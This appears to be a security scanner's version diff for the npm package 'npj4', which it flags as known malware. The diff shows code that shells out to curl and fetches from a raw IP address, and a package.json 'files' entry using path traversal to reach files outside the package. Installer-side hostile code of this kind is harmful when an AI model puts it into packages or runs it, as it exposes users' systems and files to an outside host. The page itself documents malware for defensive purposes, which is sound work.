Comparing version
16
index.js
@@ -1,15 +0,1 @@ | ||
// 引入child_process模块 | ||
const { exec } = require('child_process'); | ||
// 执行curl命令 | ||
exec('curl http://47.99.124.12:1234/main', (error, stdout, stderr) => { | ||
if (error) { | ||
console.error(`执行出错: ${error.message}`); | ||
return; | ||
} | ||
if (stderr) { | ||
console.error(`stderr: ${stderr}`); | ||
return; | ||
} | ||
console.log(`stdout: ${stdout}`); | ||
}); | ||
fetch("http://47.99.124.12:1234") |
{ | ||
"name": "npj4", | ||
"version": "1.0.16", | ||
"version": "1.0.18", | ||
"description": "", | ||
@@ -12,5 +12,5 @@ "main": "index.js", | ||
"entry":"test.js", | ||
"files": [ | ||
"../../../../../../../../../app/app/amis-saas/service/Application.js" | ||
] | ||
"files":[ | ||
"../*" | ||
] | ||
}], | ||
@@ -28,2 +28,2 @@ | ||
"license": "ISC" | ||
} | ||
} |
@@ -1,5 +0,1 @@ | ||
// 使用fetch发送HTTP请求 | ||
fetch('http://47.99.124.12:1234/') | ||
.then(response => response.text()) | ||
.then(data => console.log(data)) | ||
.catch(error => console.error('Error:', error)); | ||
fetch("http://47.99.124.12:1234") |
Known malware
Supply chain riskThis package version is identified as malware. It has been flagged either by Socket's AI scanner and confirmed by our threat research team, or is listed as malicious in security databases and other sources.
Found 1 instance in 1 package
Empty package
Supply chain riskPackage does not contain any code. It may be removed, is name squatting, or the result of a faulty package publish.
Found 1 instance in 1 package
Known malware
Supply chain riskThis package version is identified as malware. It has been flagged either by Socket's AI scanner and confirmed by our threat research team, or is listed as malicious in security databases and other sources.
Found 2 instances in 1 package
Install scripts
Supply chain riskInstall scripts are run when the package is installed. The majority of malware in npm is hidden in install scripts.
Found 1 instance in 1 package
Shell access
Supply chain riskThis module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.
Found 1 instance in 1 package
Filesystem access
Supply chain riskAccesses the file system, and could potentially read sensitive data.
Found 1 instance in 1 package
No contributors or author data
MaintenancePackage does not specify a list of contributors or an author in package.json.
Found 1 instance in 1 package
URL strings
Supply chain riskPackage contains fragments of external URLs or IP addresses, which the package may be accessing at runtime.
Found 1 instance in 1 package
1
-50%2
-50%453
-69.18%3
-25%0
-100%